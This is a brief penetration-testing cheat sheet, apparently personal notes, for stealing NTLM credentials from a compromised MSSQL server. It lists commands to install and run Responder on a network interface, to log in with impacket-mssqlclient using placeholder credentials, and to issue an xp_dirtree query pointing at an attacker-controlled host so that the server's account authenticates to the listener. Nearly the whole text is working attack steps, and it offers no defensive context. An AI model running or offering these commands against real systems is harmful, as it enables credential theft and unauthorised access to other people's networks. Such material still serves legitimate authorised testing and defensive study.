SMB Relay Attack with MSSQL xp_dirtree Query to Steal NTLM Credential
Setup Request Capturer
Tools Installation.
git clone https://github.com/lgandx/Responder
cd Responder/
pip3 install -r requirements.txt
sudo apt install impacket-scripts -y
Run Responder to capture the requests.
sudo python3 Responder.py -I eth0
Execution
Login to compromised MSSQL Service with MSSQL Client.
sudo impacket-mssqlclient <user>:"<password>"@<target host> -p <port> -debug
Run the query to steal SMB’s cred after Login.
xp_dirtree '\\<attacker host>\test';